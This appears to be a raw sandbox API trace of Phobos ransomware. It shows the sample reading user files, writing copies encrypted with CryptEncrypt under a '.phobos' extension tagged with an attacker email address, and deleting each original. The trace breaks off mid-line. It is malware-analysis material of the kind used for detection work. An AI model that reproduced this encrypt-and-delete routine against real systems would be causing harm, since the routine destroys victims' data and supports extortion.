(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.577] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=17003) returned 1 [0165.577] CloseHandle (hObject=0x14c) returned 1 [0165.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json")) returned 0x2020 [0165.577] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0165.578] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.578] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.578] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c68) returned 1 [0165.578] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.578] ReadFile (in: hFile=0x14c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x426b, lpOverlapped=0x0) returned 1 [0165.621] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4270, dwBufLen=0x4270 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4270) returned 1 [0165.621] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4270, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4270, lpOverlapped=0x0) returned 1 [0165.622] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0165.622] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.623] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0165.623] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.623] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0165.623] CryptDestroyKey (hKey=0xa32c68) returned 1 [0165.623] CloseHandle (hObject=0x14c) returned 1 [0165.623] CloseHandle (hObject=0x190) returned 1 [0165.623] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\messages.json")) returned 1 [0165.624] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.860] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=15929) returned 1 [0165.860] CloseHandle (hObject=0x148) returned 1 [0165.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json")) returned 0x2020 [0165.860] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.860] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.860] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.861] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0165.861] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.861] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3e39, lpOverlapped=0x0) returned 1 [0165.917] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e40, dwBufLen=0x3e40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3e40) returned 1 [0165.917] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3e40, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3e40, lpOverlapped=0x0) returned 1 [0165.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0165.919] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.919] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0165.919] CryptDestroyKey (hKey=0xa327e8) returned 1 [0165.919] WriteFile (in: hFile=0x190, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0165.919] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0165.919] CloseHandle (hObject=0x148) returned 1 [0165.919] CloseHandle (hObject=0x190) returned 1 [0165.919] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_metadata\\verified_contents.json")) returned 1 [0165.920] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Extension Settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\sync extension settings\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\000003.log"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.921] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=0) returned 1 [0165.921] CloseHandle (hObject=0x190) returned 1 [0165.921] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0165.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.921] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=1208051) returned 1 [0165.921] CloseHandle (hObject=0x190) returned 1 [0165.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db")) returned 0x2022 [0165.921] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0165.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0165.922] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.922] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0165.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0165.922] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ca8) returned 1 [0165.922] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0165.922] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x110100, lpOverlapped=0x0) returned 1 [0165.936] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110100, dwBufLen=0x110100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110100) returned 1 [0165.945] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110100, lpOverlapped=0x0) returned 1 [0166.124] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x16df3, lpOverlapped=0x0) returned 1 [0166.125] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16e00, dwBufLen=0x16e00 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x16e00) returned 1 [0166.126] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x16e00, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x16e00, lpOverlapped=0x0) returned 1 [0166.127] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ba8) returned 1 [0166.127] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.127] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0166.127] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.127] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0166.128] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0166.128] CloseHandle (hObject=0x190) returned 1 [0166.128] CloseHandle (hObject=0x148) returned 1 [0166.128] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\iconcache.db")) returned 1 [0166.144] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0166.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.144] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=67) returned 1 [0166.144] CloseHandle (hObject=0x190) returned 1 [0166.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini")) returned 0x2026 [0166.144] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0166.144] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.145] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0166.316] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ba8) returned 1 [0166.316] CryptSetKeyParam (hKey=0xa32ba8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.316] ReadFile (in: hFile=0x190, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x43, lpOverlapped=0x0) returned 1 [0166.317] CryptEncrypt (in: hKey=0xa32ba8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0166.317] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x50, lpOverlapped=0x0) returned 1 [0166.351] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ce8) returned 1 [0166.351] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0166.351] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0166.351] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0166.351] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0166.352] CryptDestroyKey (hKey=0xa32ba8) returned 1 [0166.352] CloseHandle (hObject=0x190) returned 1 [0166.352] CloseHandle (hObject=0x178) returned 1 [0166.352] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini")) returned 1 [0166.353] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0166.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.375] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=9204) returned 1 [0166.375] CloseHandle (hObject=0x134) returned 1 [0166.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat")) returned 0x2020 [0166.376] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0166.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0166.376] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.376] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0166.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 